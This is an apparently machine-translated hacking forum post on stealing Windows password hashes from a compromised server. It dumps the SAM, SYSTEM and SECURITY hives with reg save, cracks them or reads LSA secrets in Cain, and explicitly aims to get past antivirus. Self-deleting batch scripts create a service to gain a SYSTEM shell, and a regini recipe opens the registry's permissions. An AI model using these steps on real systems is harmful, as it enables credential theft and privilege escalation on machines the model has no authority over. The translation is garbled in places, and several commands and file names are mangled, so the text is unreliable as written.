How to export the system registry to capture Hash

From: Sword

Let's take a look at the original article "export the system registry to capture Hash", which is a good idea.

==================== Original================== After logging on to the target 3389, I am optimistic that many people are used to the password HASH and return to the rainbow table to crack the plaintext, or upload a winloginhack to record the 3389 logon password. In my recent penetration, I found that pwdump, fgdump, and other tools have been killed, and these tools are all injected into the lsass.exe process. In the face of anti-virus software such as macloud, by default, it cannot be bypassed. Winlogin is released online. After my tests, it has no effect on WIN2008. Today, I browsed the BLOG and saw foreigners mention another method of grasping the hash of system passwords. After practice, I found it feasible and shared it with you.
First, log on with the administrator permission, and then use reg to save the SECURITY, SAM, and SYSTEM under HKLM in the registry. Note that the save option of reg must be used here, and the export option cannot be used, reg save hklm \ sam. hive
Reg save hklm \ system ystem. hive
Reg save hklm \ security. hive
Figure 1. hive, system. hive, security. download hive back to your local computer and open CAIN. Under the "Decoders" tab, click "LSA Secrets" and click "+" to import the system. hive and security. hive. figure 2 the Administrator's plaintext password is usually displayed here. 3. Of course, the password here is also a historical password. If the logon attempt is incorrect, you can try to crack lm/ntlm hash.
Figure 3
To crack LM/NTLM hash, first click LM & NTLM hashes under the "cracker" label, and then click "+" to import sam. hive. Note that because syskey is used by default in win2000, You need to import the system. the value of syskey in hive, and then the rainbow table can be cracked. 4. figure 5 Figure 5: This method is not applicable to all WINDOWS Release versions. For example, for WINDOWS 2000 sp4 and WINDOWS xp sp2, WINDOWS 2008 and are useful. The work list is as follows: Windows 2000 SP4 (admin) = access denied Windows XP SP2 (admin) = access denied Windows XP SP3 (admin) = access denied Windows 2003 R2 SP2 (admin) = works Windows Vista SP2 (UAC/admin) = works Windows 2008 SP1 (admin) = works Windows 7 (UAC/admin) = works ================ How to read registry Elevation of Privilege======================= 1. The following TheLostMind IDEA requires user permissions. By default, XP SP3 cannot be exported, I tested it locally, but the system permission is acceptable, so we can create a CMD with the system permission to run, and then export it to OK. I haven't tested any other systems. Let's try it on your own. First, create a CMD: =============================startsystemcmd. bat ========= SC Create systemcmd binPath = "cmd/K start" type = own type = interact
SC start systemcmd
SC delete systemcmd
Del % 0 ====================================== END ============== ============ then export the file. ========================== SaveReg. bat =======================================@ echo off
Reg save hklm \ sam. hive
Reg save hklm \ system. hive
Reg save hklm \ security. hive
Del % 0 ==================================== END ====================== ================ and then pour it into the CAIN to break it. 2. My idea is that sometimes we cannot jump out again. In this case, we can use regini.exe to modify the Registry access permission. First, create a text file pri. ini, the content is as follows: =========== pri. ini ========================== HKEY_LOCAL_MACHINE \ SECURITY [1 17] HKEY_LOCAL_MACHINE \ SAM [1 17] ====== ==================================== then execute regini.exe pri. the content written in batch by ini is as follows: ================================ echo HKEY_LOCAL_MACHINE \ SECURITY [1 17]> pri. iniecho HKEY_LOCAL_MACHINE \ SAM [1 17]> pri.iniregini.exe pri. inidel pri. ini ==================================== note: the above operations are to set hklm \ security and hkl M \ sam grants full access to Administrators and systems. Hklm \ system is generally accessible to administrators and can be modified as needed. The preceding two table items are critical for system login. Please modify them with caution.
Finally, you can use reg to export the Registry content.